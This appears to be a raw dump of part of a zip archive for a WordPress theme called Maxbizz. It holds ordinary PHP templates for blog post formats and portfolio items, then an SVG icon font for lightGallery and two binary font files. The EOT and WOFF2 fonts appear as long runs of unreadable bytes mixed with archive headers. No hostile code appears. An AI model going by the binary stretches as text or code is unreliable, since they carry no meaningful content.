	<div class="post-inner">
	    <?php if( $format == 'gallery' ) { ?>

			<div class="entry-media">
				<?php maxbizz_posted_in(); ?>
				<div class="gallery-post owl-carousel owl-theme">
				<?php if( function_exists( 'rwmb_meta' ) ) { ?>
		            <?php $images = rwmb_meta( 'post_gallery', array( 'size' =>'full' ) ); ?>
		            <?php if($images){ ?>              
		                <?php foreach ( $images as $image ) {  ?>		
							<div class="item-image">
								<img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
							</div>                
		                <?php } ?>                
		            <?php } ?>
		        <?php } ?>
		        </div>
			</div>			

	    <?php }elseif( $format == 'image' ) { ?>

	    	<div class="entry-media">
				<?php maxbizz_posted_in(); ?>
				<?php if( function_exists( 'rwmb_meta' ) ) { ?>
				    <?php $images = rwmb_meta( 'post_image', array( 'size' =>'full' ) ); ?>
				    <?php if($images){ ?>              
				        <?php foreach ( $images as $image ) {  ?>				            
				            <a href="<?php the_permalink(); ?>">
				            	<img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
				            </a>
				        <?php } ?>                
				    <?php } ?>
				<?php } ?>
			</div>
			
	    <?php }elseif( $format == 'audio' ){ ?>

			<div class="audio-box padding-box">
				<iframe scrolling="no" frameborder="no" src="<?php echo esc_url( $link_audio ); ?>"></iframe>
			</div>

	    <?php }elseif( $format == 'video' ){ ?>

			<div class="entry-media">
				<?php maxbizz_posted_in(); ?>
				<?php if( function_exists( 'rwmb_meta' ) ) { ?>
				    <?php $images = rwmb_meta( 'bg_video', array( 'size' =>'full' ) ); ?>
					<?php if($images){ ?>     
						<div class="video-popup">        
							<a class="btn-play" href="<?php echo esc_url( $link_video ); ?>">
								<i class="ot-flaticon-play"></i>
							</a> 
						</div>
				        <?php  foreach ( $images as $image ) {  ?>
				            <img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
				        <?php } ?>                
				    <?php } ?>
				<?php } ?>
			</div>

	    <?php }elseif( $format == 'link' ){ ?>

			<div class="link-box padding-box">
				<i class="ot-flaticon-multimedia"></i>
				<a href="<?php echo esc_url( $link_link ); ?>"><?php echo esc_html( $text_link ); ?></a>
			</div>

	    <?php }elseif( $format == 'quote' ){ ?>

			<div class="quote-box padding-box font-second">
				<i class="ot-flaticon-left-quote"></i>
				<div class="quote-text">
					<?php echo esc_html( $quote_text ); ?>
					<span><?php echo esc_html( $quote_name ); ?></span>
				</div>
			</div>

	    <?php }elseif ( has_post_thumbnail() ) { ?>

	        <div class="entry-media">
	        	<?php maxbizz_posted_in(); ?>
	            <a href="<?php the_permalink(); ?>">
	                <?php the_post_thumbnail(); ?>
	            </a>
	        </div>
	        
	    <?php } ?>

	    <div class="inner-post">
			<?php if( $format != 'gallery' && $format != 'image' && $format != 'video' && !has_post_thumbnail() ) maxbizz_posted_in(); ?>
	        <div class="entry-header">

	            <?php the_title( '<h4 class="entry-title"><a class="title-link" href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h4>' ); ?>

	        </div><!-- .entry-header -->

	        <div class="entry-summary the-excerpt">

	            <?php the_excerpt(); ?>

	        </div><!-- .entry-content -->
		</div>
		<?php if ( 'post' === get_post_type() ) : ?>
		<div class="entry-meta">
			<?php if( maxbizz_get_option( 'post_entry_meta' ) ) { maxbizz_post_meta(); } ?>
	        <a href="<?php the_permalink(); ?>" class="btn-details"><i class="ot-flaticon-trajectory"></i></a>
		</div><!-- .entry-meta -->
		<?php endif; ?>
	</div>
</article><!-- #post-<?php the_ID(); ?> -->
PK�8FZ��6��(template-parts/content-project-metro.phpnu�[���<?php
/**
 * Template part for displaying widget Portfolio Filter Metro
 *
 * @package Maxbizz
 */
?>
<?php 
	$cates = get_the_terms(get_the_ID(),'portfolio_cat');
    $cate_id   = '';
    if($cates){
	    foreach((array)$cates as $cate){
	        $cate_id   .= 'category-' . $cate->term_id . ' ';
	    }
	}
	$thumb = '';
	if ( function_exists('rwmb_meta') ) {
		$thumb = rwmb_meta('thumb_size');
	}
?>
<div class="project-item <?php echo esc_attr( $cate_id );  echo esc_attr( $thumb ); ?>">
	<div class="projects-box">
		<div class="projects-thumbnail" data-src="<?php echo esc_url(get_the_post_thumbnail_url()); ?>" data-sub-html="<?php the_title(); ?>">
			<a href="<?php the_permalink(); ?>">
				<?php
					if ( has_post_thumbnail() ) {
						if( $thumb == 'double_w' ){
							the_post_thumbnail( 'maxbizz-portfolio-thumbnail-grid-wdouble' );
						}elseif( $thumb == 'double_wh' ){
							the_post_thumbnail( 'maxbizz-portfolio-thumbnail-grid-whdouble' );
						}else{
							the_post_thumbnail( 'maxbizz-portfolio-thumbnail-grid' );
						}
					}
				?>
			</a>
			<span class="overlay"><i class="ot-flaticon-signs"></i></span>
		</div>
		<div class="portfolio-info">
			<a href="<?php the_permalink(); ?>" class="overlay"></a>
			<div class="portfolio-info-inner">
				<a href="<?php the_permalink(); ?>" class="plus"><i class="ot-flaticon-signs"></i></a>
				<h5><a class="title-link" href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h5>
				<?php 
					if ( ! is_wp_error( $cates ) && ! empty( $cates ) ) :
						echo '<p class="portfolio-cates">';	 
						foreach ( (array)$cates as $term ) {
							// The $term is an object, so we don't need to specify the $taxonomy.
							$term_link = get_term_link( $term );
							// If there was an error, continue to the next term.
							if ( is_wp_error( $term_link ) ) {
								continue;
							}
							// We successfully got a link. Print it out.
							echo '<span> / </span><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a>';
						}		                         
						
						echo '</p>';    
					endif; 
				?> 
			</div>
		</div>
	</div>
</div>PK�8FZ^�w��*template-parts/content-project-masonry.phpnu�[���<?php 
	$cates = get_the_terms(get_the_ID(),'portfolio_cat');
    $cate_id   = '';
    if($cates){
	    foreach((array)$cates as $cate){
	        $cate_id   .= 'category-' . $cate->term_id . ' ';
	    }
	}
?>
<div class="project-item <?php echo esc_attr( $cate_id ); ?>">
	<div class="projects-box">
		<div class="projects-thumbnail" data-src="<?php echo esc_url(get_the_post_thumbnail_url()); ?>" data-sub-html="<?php the_title(); ?>">
			<a href="<?php the_permalink(); ?>">
				<?php
					if ( has_post_thumbnail() ) {
						the_post_thumbnail();
					}
				?>
			</a>
			<span class="overlay"><i class="ot-flaticon-signs"></i></span>
		</div>
		<div class="portfolio-info">
			<a href="<?php the_permalink(); ?>" class="overlay"></a>
			<div class="portfolio-info-inner">
				<a href="<?php the_permalink(); ?>" class="plus"><i class="ot-flaticon-signs"></i></a>
				<h5><a class="title-link" href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h5>
				<?php 
					if ( ! is_wp_error( $cates ) && ! empty( $cates ) ) :
						echo '<p class="portfolio-cates">';	 
						foreach ( (array)$cates as $term ) {
							// The $term is an object, so we don't need to specify the $taxonomy.
							$term_link = get_term_link( $term );
							// If there was an error, continue to the next term.
							if ( is_wp_error( $term_link ) ) {
								continue;
							}
							// We successfully got a link. Print it out.
							echo '<span> / </span><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a>';
						}		                         
						
						echo '</p>';    
					endif; 
				?> 
			</div>
		</div>
	</div>
</div>PK�8FZ�񷼸�fonts/lg.eotnu�[����(�LP׍K�lgRegularVersion 1.0lg�0OS/2�`cmap��3o�gasp�glyfZ	+��	�head	t�>X6hhea���$hmtxJQ�TlocavX,maxp�4 name���MT�post ��������3	@����@�@ � ���3�p�����
��
����� ���3�p�������
�����������t���797979V�U#'327654'&#"2#"'&54763*V��eeee��eeee��}}}}��}}}}0VT���ee��eeee��ee}}��}}}}��}}��T��V�U"%27654'&#"2#"'&5476�eeee��eeee��}}}}��}}}}ZUee��eeee��ee}}��}}}}��}}����U�U(=!2#!"'&547633!#!"'&5476%!"3!27654'&#��5%&&%5�U5&%%&5�
$!!)�U5%&��U

�

U%&5�V5&%%&5�5&%���
%&%5�)!!j
�V

�
��*�''7'77*��<��<��<�����<��<��<��UU�"2!2#!#"'&54763�
��

�g�

��

*

�

�

*

+UU�"2#"'&54?!"'&54763!'&54763U
*

��
�g

����
��

�

��+V+
7!!'33���T���T�VV����V	�UV#%53535373#53!535335353�����T�T�����T���T��T�U����������������������*�3#5#53#553#3#5V�T��T��Ԁ���Ԁ�T��T,�T���T���*�3#5353#53#553#5���TTԀ��T��TUT���T�Ԁ�T��TԀ�Aj+2##5#5353327654'&#"!'5'#"'&547632V*VV*VjP8888PP8888P�@�LhtQQQQttPPBVV*VV�88PP8888PP88�@�"BPPttQQQQthL�Aj+*3#27654'&#"!'5'#"'&547632*��lP8888PP8888P�@�LhtQQQQttPPB+*�88PP8888PP88�@�"BPPttQQQQthL��U3%2#"&5<7%#"&54632%.54632#"&'>3II33I��,4LK5-,K54LK5-��0,�I33KK3�K54L�4LL45K������)"32>54.##"3##5#53546;f��NN��ff��NN��ftI\
OWOO<.I�M��ff��NN��ff��M��6L��L-0EQ����N[n�"32>54.##*10"#"&546;.1*#"&'.54673%##5#53533*#7>'.#7.#*3:7>'f��NN��ff��NN��f-	iu
 ww
	%L4LL4L��4##+)!-

#	�M��ff��NN��ff��M�BDC!
*R
' %
	+##3�MM3MM3;

%#� 

#7����A"32>54.#.'&67&6>&'..7>76'f��NN��ff��NN��f"
 %&*/
$&4
"ZM1,l@R�+C+�M��ff��NN��ff��M��5_Q�@&k>C:6QV")O1!
@-Ka	KL,UC'����T"32>54.##"&'23267.'3267.=.5467.54632>7>7f��NN��ff��NN��f�$FfC)K!"= 1
	
!-
$g=9($
	�M��ff��NN��ff��M�n0bO2&5#
+
,7(9

�K��_<��4���4����������VVU�UU�������
^��H����"l��4�N��	�;/P5
V-
�"�	�		B	1	R		7	
4p	Z3	
�	D�lglghttps://github.com/sachinchoolur/lightGalleryhttps://github.com/sachinchoolur/lightGallerysachinsachinMLTMLThttp://opensource.org/licenses/MIThttp://opensource.org/licenses/MITVersion 1.0Version 1.0lglglglgRegularRegularlglgFont generated by IcoMoon.Font generated by IcoMoon.PK�8FZFQ�e�"�"fonts/lg.svgnu�[���<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
<json>
<![CDATA[
{
	"fontFamily": "lg",
	"majorVersion": 1,
	"minorVersion": 0,
	"fontURL": "https://github.com/sachinchoolur/lightGallery",
	"copyright": "sachin",
	"license": "MLT",
	"licenseURL": "http://opensource.org/licenses/MIT",
	"version": "Version 1.0",
	"fontId": "lg",
	"psName": "lg",
	"subFamily": "Regular",
	"fullName": "lg",
	"description": "Font generated by IcoMoon."
}
]]>
</json>
</metadata>
<defs>
<font id="lg" horiz-adv-x="1024">
<font-face units-per-em="1024" ascent="960" descent="-64" />
<missing-glyph horiz-adv-x="1024" />
<glyph unicode="&#x20;" horiz-adv-x="512" d="" />
<glyph unicode="&#xe01a;" glyph-name="pause_circle_outline" data-tags="pause_circle_outline" d="M554 256.667v340h86v-340h-86zM512 84.667q140 0 241 101t101 241-101 241-241 101-241-101-101-241 101-241 241-101zM512 852.667q176 0 301-125t125-301-125-301-301-125-301 125-125 301 125 301 301 125zM384 256.667v340h86v-340h-86z" />
<glyph unicode="&#xe01d;" glyph-name="play_circle_outline" data-tags="play_circle_outline" d="M512 84.667q140 0 241 101t101 241-101 241-241 101-241-101-101-241 101-241 241-101zM512 852.667q176 0 301-125t125-301-125-301-301-125-301 125-125 301 125 301 301 125zM426 234.667v384l256-192z" />
<glyph unicode="&#xe033;" glyph-name="stack-2" data-tags="stack-2" d="M384 853.334h426.667q53 0 90.5-37.5t37.5-90.5v-426.667q0-53-37.5-90.5t-90.5-37.5h-426.667q-53 0-90.5 37.5t-37.5 90.5v426.667q0 53 37.5 90.5t90.5 37.5zM170.667 675.334v-547.333q0-17.667 12.5-30.167t30.167-12.5h547.333q-13.333-37.667-46.333-61.5t-74.333-23.833h-426.667q-53 0-90.5 37.5t-37.5 90.5v426.667q0 41.333 23.833 74.333t61.5 46.333zM810.667 768h-426.667q-17.667 0-30.167-12.5t-12.5-30.167v-426.667q0-17.667 12.5-30.167t30.167-12.5h426.667q17.667 0 30.167 12.5t12.5 30.167v426.667q0 17.667-12.5 30.167t-30.167 12.5z" />
<glyph unicode="&#xe070;" glyph-name="clear" data-tags="clear" d="M810 664.667l-238-238 238-238-60-60-238 238-238-238-60 60 238 238-238 238 60 60 238-238 238 238z" />
<glyph unicode="&#xe094;" glyph-name="arrow-left" data-tags="arrow-left" d="M426.667 768q17.667 0 30.167-12.5t12.5-30.167q0-18-12.667-30.333l-225.667-225.667h665q17.667 0 30.167-12.5t12.5-30.167-12.5-30.167-30.167-12.5h-665l225.667-225.667q12.667-12.333 12.667-30.333 0-17.667-12.5-30.167t-30.167-12.5q-18 0-30.333 12.333l-298.667 298.667q-12.333 13-12.333 30.333t12.333 30.333l298.667 298.667q12.667 12.333 30.333 12.333z" />
<glyph unicode="&#xe095;" glyph-name="arrow-right" data-tags="arrow-right" d="M597.333 768q18 0 30.333-12.333l298.667-298.667q12.333-12.333 12.333-30.333t-12.333-30.333l-298.667-298.667q-12.333-12.333-30.333-12.333-18.333 0-30.5 12.167t-12.167 30.5q0 18 12.333 30.333l226 225.667h-665q-17.667 0-30.167 12.5t-12.5 30.167 12.5 30.167 30.167 12.5h665l-226 225.667q-12.333 12.333-12.333 30.333 0 18.333 12.167 30.5t30.5 12.167z" />
<glyph unicode="&#xe0f2;" glyph-name="vertical_align_bottom" data-tags="vertical_align_bottom" d="M170 128.667h684v-86h-684v86zM682 384.667l-170-172-170 172h128v426h84v-426h128z" />
<glyph unicode="&#xe1ff;" glyph-name="apps" data-tags="apps" d="M682 84.667v172h172v-172h-172zM682 340.667v172h172v-172h-172zM426 596.667v172h172v-172h-172zM682 768.667h172v-172h-172v172zM426 340.667v172h172v-172h-172zM170 340.667v172h172v-172h-172zM170 84.667v172h172v-172h-172zM426 84.667v172h172v-172h-172zM170 596.667v172h172v-172h-172z" />
<glyph unicode="&#xe20c;" glyph-name="fullscreen" data-tags="fullscreen" d="M598 724.667h212v-212h-84v128h-128v84zM726 212.667v128h84v-212h-212v84h128zM214 512.667v212h212v-84h-128v-128h-84zM298 340.667v-128h128v-84h-212v212h84z" />
<glyph unicode="&#xe20d;" glyph-name="fullscreen_exit" data-tags="fullscreen_exit" d="M682 596.667h128v-84h-212v212h84v-128zM598 128.667v212h212v-84h-128v-128h-84zM342 596.667v128h84v-212h-212v84h128zM214 256.667v84h212v-212h-84v128h-128z" />
<glyph unicode="&#xe311;" glyph-name="zoom_in" data-tags="zoom_in" d="M512 512.667h-86v-86h-42v86h-86v42h86v86h42v-86h86v-42zM406 340.667q80 0 136 56t56 136-56 136-136 56-136-56-56-136 56-136 136-56zM662 340.667l212-212-64-64-212 212v34l-12 12q-76-66-180-66-116 0-197 80t-81 196 81 197 197 81 196-81 80-197q0-104-66-180l12-12h34z" />
<glyph unicode="&#xe312;" glyph-name="zoom_out" data-tags="zoom_out" d="M298 554.667h214v-42h-214v42zM406 340.667q80 0 136 56t56 136-56 136-136 56-136-56-56-136 56-136 136-56zM662 340.667l212-212-64-64-212 212v34l-12 12q-76-66-180-66-116 0-197 80t-81 196 81 197 197 81 196-81 80-197q0-104-66-180l12-12h34z" />
<glyph unicode="&#xe80d;" glyph-name="share" data-tags="share" d="M768 252.667c68 0 124-56 124-124s-56-126-124-126-124 58-124 126c0 10 0 20 2 28l-302 176c-24-22-54-34-88-34-70 0-128 58-128 128s58 128 128 128c34 0 64-12 88-34l300 174c-2 10-4 20-4 30 0 70 58 128 128 128s128-58 128-128-58-128-128-128c-34 0-64 14-88 36l-300-176c2-10 4-20 4-30s-2-20-4-30l304-176c22 20 52 32 84 32z" />
<glyph unicode="&#xe901;" glyph-name="facebook-with-circle" data-tags="facebook-with-circle" d="M512 952.32c-271.462 0-491.52-220.058-491.52-491.52s220.058-491.52 491.52-491.52 491.52 220.058 491.52 491.52-220.058 491.52-491.52 491.52zM628.429 612.659h-73.882c-8.755 0-18.483-11.52-18.483-26.829v-53.35h92.416l-13.978-76.083h-78.438v-228.403h-87.194v228.403h-79.104v76.083h79.104v44.749c0 64.205 44.544 116.378 105.677 116.378h73.882v-80.947z" />
<glyph unicode="&#xe902;" glyph-name="google-with-circle" data-tags="google+-with-circle" d="M512 952.32c-271.462 0-491.52-220.058-491.52-491.52s220.058-491.52 491.52-491.52 491.52 220.058 491.52 491.52-220.058 491.52-491.52 491.52zM483.686 249.805c-30.874-15.002-64.102-16.589-76.954-16.589-2.458 0-3.84 0-3.84 0s-1.178 0-2.765 0c-20.070 0-119.962 4.608-119.962 95.59 0 89.395 108.8 96.41 142.131 96.41h0.87c-19.251 25.702-15.258 51.61-15.258 51.61-1.69-0.102-4.147-0.205-7.168-0.205-12.544 0-36.762 1.997-57.549 15.411-25.498 16.384-38.4 44.288-38.4 82.893 0 109.107 119.142 113.51 120.32 113.613h118.989v-2.611c0-13.312-23.91-15.923-40.192-18.125-5.53-0.819-16.64-1.894-19.763-3.482 30.157-16.128 35.021-41.421 35.021-79.104 0-42.906-16.794-65.587-34.611-81.51-11.059-9.882-19.712-17.613-19.712-28.006 0-10.189 11.878-20.582 25.702-32.717 22.579-19.917 53.555-47.002 53.555-92.723 0-47.258-20.326-81.050-60.416-100.454zM742.4 460.8h-76.8v-76.8h-51.2v76.8h-76.8v51.2h76.8v76.8h51.2v-76.8h76.8v-51.2zM421.018 401.92c-2.662 0-5.325-0.102-8.038-0.307-22.733-1.69-43.725-10.189-58.88-24.013-15.053-13.619-22.733-30.822-21.658-48.179 2.304-36.403 41.37-57.702 88.832-54.323 46.694 3.379 77.824 30.31 75.571 66.714-2.15 34.202-31.898 60.109-75.827 60.109zM465.766 599.808c-12.39 43.52-32.358 56.422-63.386 56.422-3.328 0-6.707-0.512-9.933-1.382-13.466-3.84-24.166-15.053-30.106-31.744-6.093-16.896-6.451-34.509-1.229-54.579 9.472-35.891 34.97-61.901 60.672-61.901 3.379 0 6.758 0.41 9.933 1.382 28.109 7.885 45.722 50.79 34.048 91.802z" />
<glyph unicode="&#xe903;" glyph-name="pinterest-with-circle" data-tags="pinterest-with-circle" d="M512 952.32c-271.462 0-491.52-220.058-491.52-491.52s220.058-491.52 491.52-491.52 491.52 220.058 491.52 491.52-220.058 491.52-491.52 491.52zM545.638 344.32c-31.539 2.406-44.749 18.022-69.427 32.973-13.568-71.219-30.157-139.52-79.309-175.206-15.206 107.725 22.221 188.518 39.629 274.381-29.645 49.92 3.533 150.323 66.099 125.645 76.954-30.515-66.662-185.6 29.747-205.005 100.659-20.173 141.773 174.694 79.36 237.978-90.214 91.494-262.502 2.099-241.306-128.87 5.12-32 38.246-41.728 13.21-85.914-57.702 12.8-74.957 58.317-72.704 118.989 3.533 99.328 89.242 168.909 175.155 178.483 108.698 12.083 210.688-39.885 224.819-142.182 15.821-115.405-49.101-240.282-165.274-231.27z" />
<glyph unicode="&#xe904;" glyph-name="twitter-with-circle" data-tags="twitter-with-circle" d="M512 952.32c-271.462 0-491.52-220.058-491.52-491.52s220.058-491.52 491.52-491.52 491.52 220.058 491.52 491.52-220.058 491.52-491.52 491.52zM711.936 549.683c0.205-4.198 0.256-8.397 0.256-12.493 0-128-97.331-275.507-275.405-275.507-54.682 0-105.574 15.974-148.378 43.52 7.526-0.922 15.258-1.28 23.091-1.28 45.363 0 87.091 15.411 120.218 41.421-42.342 0.819-78.080 28.774-90.419 67.174 5.888-1.075 11.93-1.69 18.176-1.69 8.806 0 17.408 1.178 25.498 3.379-44.288 8.909-77.67 48.026-77.67 94.925v1.178c13.056-7.219 28.006-11.622 43.878-12.134-26.010 17.408-43.059 47.002-43.059 80.64 0 17.715 4.762 34.406 13.107 48.691 47.77-58.573 119.040-97.075 199.526-101.222-1.69 7.117-2.509 14.49-2.509 22.118 0 53.402 43.315 96.819 96.819 96.819 27.802 0 52.992-11.776 70.656-30.618 22.067 4.403 42.752 12.39 61.44 23.501-7.219-22.579-22.528-41.574-42.547-53.606 19.61 2.406 38.246 7.578 55.603 15.309-12.954-19.405-29.389-36.506-48.282-50.125z" />
</font></defs></svg>PK�8FZM̶�6�6fonts/Flaticon.woff2nu�[���wOF26�
d�6m?FFTM`�J
����H�*6$�2 �<�HIQe��8�c6#vs��f��)�C�6��>R~�%��I��Hܧy=�����B�.�F&�r���|xw�>�Q�rs��#q�ϭ�~����Q K�76*7��@80Ic���uw�y��gW�w���\�n�^_�0��~�N�Ų��D%�����E.����?��6�P^
�L�8��q�W�H�����v`��4@^�m�m_K5��G���Β�M���K��Ƅ��8�i��/)���].W�*�Q�e��N�N��^\�����m�����ŊO��KS�����ᄃ�?�f�;���v�ǖ��9+y��
PIP�d�EYȟ���M�����6A��m�ؖ$�P�ʎ���]�)E*8�D�tb�Ȧ���|�h5MS�Ú�5�v�@p�r 3��&�D���ڢ�ӿ�~�]*��~�ɃN������Q�xȂ����:�	��]�(xE�~������-�!�a ,F�!���?�C��і�q$Z�@�>�q�o0���
�n��)�#�Z$轇���pE2�"q�o(cɁ��RX @ G(�je� cMt�B˥�*�{�r��r�X+����e�{�ɗk"
�l�=,l~&���F�X5��n�	�q�?��j�l�GY�tn�a,�k�o�y��	�:��}�o�*.�Bn��J?�Q���M]���O���/��h��-�) W"��#HZ`�gʄT�a��2���.(�J[Ʊ�E�/��-�V��ۏ�i����,�G���|Qv��
eY�j����4E�	k�h����]��ǘ�6݆�J��|-O`�J#�</�y]&o��Ί۶-lO��:||���B���nЛS�E��|�
J�~:��[$(E�*c�'92Y��:�q��a	�b��<�5
��Q��p�r�����UO�P��*'=�t,�@��A@jơO�l�j�����88"�>�m�iǶ�z�����x�m}堧������Xײ�n��Ś�b��M����u�c�rCSk�ZW�Iʹ��-Ք.wtؙ^eN��t�ṯ��n�$tz.9�iWá�T�t���]?��N{�8�=}����b�L�CE�"���p��$)%z��m1[I9V�r�zH~jI	-(S��1��%��=5�}�
�;7��Rħ���z��[�&iKe�2�H9{�CO�}�x�ө��Vp�9�G�IŌÈ!\�ǒK���Z�t�xho�Mr
�v_�%�n��N^��ቓ]�bJp�W]�ڨ�I	���
_a)d�0OO9>��%�`2-�7+�����;~�g��%�҄�=�Dp^�vrra����3���	&��	.�m8�8���rHB�]�_W:栄w��4�MWad�8Ϋ��k��	�A'-�D��:���q����z7�)� "“��ET�0�"�X�Q�<�jmi��f&'��pj*"���_H�Εr��T�W%��F��� �d��2�X����M�M���s�!�TS���I-R�b�	���n-� B_d�C�CmH1F��5�����E%)b@y�1�R��P�Rݢh�����,�C��]��Z(���h!@�i��Q؎�ZĜ�4��ڊU�Z�@�/?��C�V=Ֆ�K�,�W{O��������1kX�­���:��Q*B��a���.�Ī�Ua�[�Dj�yz�H%�3�ϗ'k�4���U3��%%�3���~w�W���9��r�K�<ƚ�c����ضh=cL�Z��&F��U���*�ܡ���.�O#+�zE����u��-��5��Z��9�������[
Q�lHJ%�DdSM�����kF9��.�^��[��C��_��3�iۀY��t@�-�*ӵ��mt��\"T��3�c`�+��KI�rD�J�m�Pƕ�'%jNX����K%G��	G-�M�a3���W�߿S${Af- f$���y�|uj��Sl�'�MCe~B��`]"`%�=K�9+��!��ӎ���68$n�Q�m3��n�1݁#�-�f��8���ڪ�ЋV���a8��s���p���sɬ��+���M���goH����](ucʴ���W�Q�T�8�:��n�=�S�A�Qk�R�A�.4Rj>1��~�Iskb]+�A����K��*�*k^�ی.�S��,�'p~*3zK8)9�gbL��%��3��0(yr�-2,c�-!�I
����?��@�=��P!؎Ú"�ǃJB��_�
�=���-�!��������}�F
��a'����~�I\�N�`�ˋ0��=Ab��f}�-!ŮO5Y�t&�1�&�X�jC�ăh�m$K@�%�;���K�Eހ��a��o`Qvs,J�\����PZ��e�*�j4IC["ѵ:P���Y��p4qNN�Mf�
ؖ`���8D2С���d�iĉ��( D%"��%`ua� �u�mDt}r
����seo���?���y��bcBD�+��4q�
wyϽ{���Ώ4���n�qF��b}2œd�ArFD!���^�3�=�,�PX��(0�qtʒ�'�7U�|P�W7��ߨ��d���,r��YG����\�a}�}�in�[r���$�s������x{��G9u�����
��EM�MX�؋1�����{峃��;�8^����c�\�e�А��E���&#�a^��Ɩ\vB�#%E�����g�[�X->�.?"<*��'��� ��=ݑm��Esb"��o�mmaknb�A �C�	4*^����<�^��™��5�X�J]�2�(~�c�h��W��$
�S��E���F~�L�G�aS��cӰ�ٴ�4y�Kp1MBDB���9^4r� �!BA���;_ð�^�=_�@]�__��E�s��*��fҖ	I������gg'&-Hd<�L9��r,�0}5�򝳾L6�D��R���U�kv�|̊�NI���ᑉC�P�!�rp�>tU�4.ْ_�].�ǐ��J-�z`�l�<��{^�^�;1^n.��LƗ��f��y#�����=�be���0���zA�4�r��f��o�}�w��ka|FB���e��&���U(A�
A��yKVj��â�=u�ዻ�s���^�ܤ;�T�A9��g#����	��9����^qZGʧ�8��5J��r�5�6�!鉹�i�y|�lǶ��e0�)�LZ@�R](wob�[�"��{�3|��ǗR��yV0�l��P7�
�0����&Վn%�*�/��B��du$�F���=�`�2�́3���)��Ӥ���J-���5��0$i)Ŧ��(5q'�Ji�
[r�����u8�d<�
$_��Nz^�陸IK3BYmIXBi�)���*[rY3峔��6I�W-����I��E&n���%��gK���=�ɤkm��FH-���OM��
���p>�#@�7|~
�ާm��?ۅ�I�J��=��?�<�1Q"�����6E'	��PJԗ�r���	d�1�����i`(�g��<�kk���~)��!����=c��lV��)Ͻs���s���|-��|��G����(��S>v�%�"Ȥ�=� ����'��5����Ж�&�\����Tj�3�]��ꄙ���*M	$�fn)^��.8O�"���}�#`#��v<"]�E(������A��HX���.Z��s�ц��-�1���'��.b{݋V�M!hd��c~�.W
-_�B�W
��c���_"�<��4N��/�"T0�-�2n�A�;��-��i��y�Ib��z��s�;�5�VLg��+��*�_������165�k����Q�	űKcW^��������}���Qq�Q�i<�7�G�\_#1�4�ǁa.0@\u��W&�޼X	�z	�;hTZA�J^K�~BH��Vܤ���2�2`L�G���&�7�|��R�I��d?��2r��2��S�ױ<{� "��j5x��SI4
�ߍ����޽᝞����C���p)z�A��x��܉;�����fg��Yrx��uC�}�����t?&��=0��8�~9a��P)t���1�o�����haݨB��w��j�q�m��M�i<PzUF!��\��c�9���-q��OW|�� !Q�O�c�y��,�d�`�]��9H���-��i�
��U�u�m�a��O�i�����ހ2B�C��֗�
�0�����~��2��󭓻����X�
.Q�Do�ٯ�\>��.K=�K�ߥ�;HJ	��`%�Ejf���[���O66�p%
V�h-�7�!�D��
Gdc l��&AXn��+2��#�l&��:�A�W�Nϝ�v������`vGޱ;\���On���޹}�����֝��z�{�h�P�~��2�Ry';X�v�!%rvMF
�[zQP&�t�yt�l������8:�G�Z!�kʝ0^>.�~`�?�V�(8�ю\�����>�'�*;oc9�|̕>����'�7|,��J��{	G�G���@�	��*�yF	���i֞z�>����y���I8ڭ�`%�d>��9B����t���x�n	�:(LBM�m~Z_����r�^���;N�
��gם�V/�wU�^O��3���-�����z"���4��b�qZ�e����c�ʗ�U��`C(U����7��/�S�}hݿz[؁\��Ӥ�s������{���c���r��羺1����4���a�f���w�N��r�������є�v�Yhf{A��?���Of(q(��d��g�<b}�V��&RSn�&�������#u�C�l��eQ2�S��\�d6��Dj���\�+9�b[m���ɌH
��_vu�Y2,�+t�An
���Q��ġ�b�p�oŅ��-<�T	�am[��������	�l� ����9K�QO;I���rTR������ͳ�V�b�g�j����K�u���}t�PJޞ�쾪N~���e/Y7e�|�VaN�����^t���j.��V{N^+�����������R��87)l�B#b��›yM���@{�;�0�$���!レ,���+������&HE�'^�<���mk����!c��o�:�A��鷅�(	�!4R����:l����4�#�:��9R�k���X�"~��\������"�To���x��C٠�Z��k8 ��+�
�7:i������W��t���X�6��@Y�a��g˧<�71�xA��r�AP9��t_�!�����~/W����l���J-b�AhzzR/C�K٭�����(Yp��Ts��<��Ss�7�ԙ׏�RP����k����z��`8S�w2������H��o伷�m��eoe�zg�_�m�m��d�G�ۼڀvW����]�'����M h[�a1�-Z4�lX��|z@GEe;D��'B���`,�̋r��O�LG������=z4��ׇe�����Ww>-��-�^�F�m���l�с�W4Ҕ�GҰ���0u��B=��{xu�iQ�c�fo�vg۶���s�v�Á���ֆ�ؖ���L[\��U��X�a�ֳ:���֭a�+�!(�@����.��ҸB�p�0ɯ.0�<����#���m����fL3N���1����[4�o{Q\nn>��B���n���l�0o��<�����-�mmv�
�MSg���e���vp���[�\�ӹ������P�#��3P�khQl�͛���l�����7i�\�k��m�VK���S���|D>"	�5��|������>��|yαj���h��̾��u��>>���?�U��fYR�-g�$N�g��
